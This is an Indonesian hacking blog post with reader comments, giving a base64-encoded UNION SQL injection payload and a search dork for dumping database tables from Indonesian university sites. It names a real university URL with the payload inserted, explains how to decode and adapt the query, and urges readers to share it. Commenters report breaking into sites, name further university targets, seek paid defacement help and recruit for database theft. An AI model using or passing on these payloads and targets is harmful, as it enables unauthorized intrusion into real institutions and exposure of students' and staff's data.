• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Base64 SQL Injection pada Situs Akademik Indonesia

May 5, 2016 by Jack Wilder 15 Comments

Tadi malam iseng jalan jalan di salahsatu grup underground terkenal di Indonesia, dan ada yang share ‘bug’ SQLi base64 pada banyak situs akademik (ac.id). Query nya pun hampir sama semua. Sehingga saat kalian menemukan situs yang memiliki celah ini, cukup memasukkan ‘exploit’ nya , dan isi database akan kelihatan.

See how its work :
# Exploit Title: Indonesian University Base64 SQL Injection
# Google Dork: news/berita-kampus-MQ== ( use your brain b!tch )
# Date: [04 – 05 – 2016 23:51]
# Exploit Author: Defacer Tersakiti
# Tested on: Ubuntu Linux, Windows

Exploit :

  • LTEnIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUsMHgzYzYyNzIzZSksNCw1LDYsNyw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpLS0gLQ==

Simple Exploit

Kita ambil contoh situs Siakad Universitas Kanjuruhan Malang :

  • http://siakad.unikama.ac.id/index.php/news/berita-kampus-MQ==

Sekarang ganti MQ== dengan query injection diatas :

  • http://siakad.unikama.ac.id/index.php/news/berita-kampus-LTEnIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUsMHgzYzYyNzIzZSksNCw1LDYsNyw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpLS0gLQ==

Boom… database kebuka.

Oke disini saya akan menjelaskan bagaimana cara kerja nya :

diatas ada kode MQ== . MQ== adalah bentuk base64 dari 1 .
Silahkan didecode di situs online atau kalau kalian menggunakan linux bisa test via terminal.

base64 -d <<< MQ==

Maka outpunya adalah angka 1.
Nah, sekarang kita ganti MQ== dengan MSc= maka isi berita nya akan blank. Kenapa MSc= ? MSc= adalah bentuk encode base64 dari 1′ .

akame@linuxsec:~$ echo -n "1'" | base64
MSc=
Yup, kita memberi string dibelakang angka untuk mengecek apakah error atau tidak.
Nah sekarang kalian tau kan kode exploit diatas berasal dari mana. Yup, dari hasil encode query berikut :
  • -1′ UNION SELECT 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9 from information_schema.tables where table_schema=database()– –

Oke mungkin sekian dulu penjelasan singkat dari saya.
Untuk dasar SQL Injection Base64 bisa dilihat disini :
SQL Injection Base64 Tutorial

baiklah sekian dulu post kali ini, sihalkan dikembangkan, jika ada kebingungan silahkan komentar. Share juga ke teman temanmu biar mereka tau.

Filed Under: SQL Injection Tagged With: Hacking, MySQL

Reader Interactions

Comments

  1. Farhan Maulana Hakim says

    May 14, 2016 at 12:36 am

    gan saya sukses sql injection web orang, udh nemuin admin, pass sama login adminnya tapi pas nyoba masuk kok gagal trus ya? ada kemungkinan apa gitu?

    #beginner

    Reply
  2. Chino Tamvan says

    May 18, 2016 at 11:39 am

    itu yang kebuka kan nama table nya , nah yang saya mau tanyakan nama database nya mana ?
    terima kasih

    Reply
    • Mwmwk says

      October 20, 2019 at 1:44 pm

      Ngeteh aso

      Reply
  3. Maulana Ridwan maliki says

    April 6, 2017 at 3:43 pm

    Saya boleh blajar bang?, pengen bgt pinter it -_-
    Kalo boleh kabarin saya ya bang 083896951062

    Reply
  4. nico el-firna says

    April 8, 2017 at 4:48 pm

    gmna bang http://unnes.ac.id/

    Reply
    • MrETad says

      March 22, 2019 at 2:04 am

      haha target lu sama kaya gue,

      Reply
  5. java nica says

    May 6, 2017 at 11:57 pm

    Kakak, saya sudah mencoba tutorial di atas dan berhasil..masuk database kedua. Lalu selanjutnya bagaimana kakak stlh tutorial di atas berhasil?

    Reply
  6. Arif lars ulrich says

    August 18, 2017 at 10:26 am

    Bang ajarin ane deface website
    www.uin-suka.ac.id/
    Nanti ane Kasih pulsa 10k

    Reply
    • Admin Ganteng says

      October 21, 2018 at 4:21 pm

      mending jual gorengan bangsat

      Reply
  7. RaynaldLa'Flame says

    August 28, 2017 at 8:42 am

    bang ada kontak nya? saya mau tanya2 ada reward nya slow aja hheh.

    Reply
  8. MrETad says

    March 22, 2019 at 2:02 am

    ini decode code yg dari adminynya

    -1′ UNION SELECT 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9 from information_schema.tables where table_schema=database()– –

    decode dari base64

    Reply
  9. Ade Aprianto says

    July 11, 2019 at 1:36 am

    siakad.uisu.ac.id

    Gimana gan?

    Reply
  10. manray says

    July 24, 2019 at 9:06 pm

    Bang mau gabung sama tim gua ngak bang dijamin tiap tahun dapat duit banyak cuma modal ngintip database doang ngak ngacak2 dijamin aman

    Reply
  11. Ciputat says

    October 16, 2022 at 8:46 am

    https://siakad.um-sorong.ac.id/index.php/newsdetail/1-user-dan-password-mahasiswa

    https://siakad.um-sorong.ac.id/index.php/newsdetail/’1-user-dan-password-mahasiswa

    Apakah ini termasuk blind SQL??

    Reply
    • Ciputat says

      October 16, 2022 at 7:33 pm

      Om TS Jack wilder, boleh minta kontak yang bisa di hubungi?

      Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

RCE pada Redis via Master-Slave Replication

WordPress 4.7.0/4.7.1 Content Injection Exploit

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Exploit WordPress Ajax Load More PHP Upload Vulnerability

Cracking FTP Password using Hydra on BackBox Linux

Tumblr Custom Domain or Subdomain Takeover

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Uptimerobot.com Custom Domain or Subdomain Takeover

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

LinuxSec / 24 queries in 0.12 seconds